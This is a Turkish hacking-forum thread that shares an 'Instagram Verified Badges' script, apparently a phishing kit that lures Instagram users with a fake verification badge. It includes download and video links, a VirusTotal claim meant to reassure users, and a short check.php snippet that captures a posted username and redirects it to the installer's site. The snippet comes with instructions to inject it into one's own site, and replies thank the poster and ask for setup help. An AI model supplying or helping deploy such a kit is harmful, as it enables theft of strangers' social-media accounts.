Instagram - Verified Badges v1 - sawetcetin

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...

sawetcetin

Üye
30 Haz 2018
144
0
Samsun
[SIZE="3[COLOR="Yellow [URL="https://tik.lat/POJco"] Youtube - Tıkla git[/URL]

Scriptten görüntü
ADJ4Jv.png

VirusTotal
VirusTotal - Tıkla git

Script dosyaları
Tıkla - indir

Not ; Sitenize enjekte etmek için check.php'deki

<?php
$user=$_POST["username​

galaxy10

Yeni üye
1 Ocak 2019
41
0
Öncelikle teşekkür ederim aradığım scrpit buydu tam da paylaşmışsın eline sağlık. Bireysel iş yapman daha mantıklı kimseye güvenmiceksin güvenmek hata.

yusufcan27

Üye
15 Mar 2017
72
0
muğla/bodrum
Merhaba arkadaşlar kişiye özel script kodlamıştım kodladığım kişi veya şöyle diyelim arkadaşım sandığım kişi arkamdan bıçaklayınca yayınlama kararı aldım umarım hoşuna gider script ile ilgili bir video çektim videoyu izleyerek tanıtımına bakabilirsiniz.

Youtube
Youtube - Tıkla git

Scriptten görüntü
ADJ4Jv.png

VirusTotal
VirusTotal - Tıkla git

Script dosyaları
Tıkla - indir

Not ; Sitenize enjekte etmek için check.php'deki

<?php
$user=$_POST["username"];
echo ' ';
header('********: SİTEADINIZ/username/?nick='.$user);
?>

Site adınızı ekleyerek kullanınız iyi forumlar :)

hocam bende çalışmadı ne yapmam gerekiyor ?

Son düzenleme:

emirhankaban

Yeni üye
1 Ocak 2019
20
0
İstanbul
Hocam tamamen baştan sona ne yapacağımı bilmiyorum elimde bir script var lakin nasıl kullanacağım nasıl düzelteceğim hakkında bilgim yok 0 dan video çekip atar mısın ?

Soullessofc

Yeni üye
1 Ara 2018
31
0
Sawetcetin beni hatırlarsın belki bozhackin grubundan soulless eline sağlık güzel çalışma olmuş

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.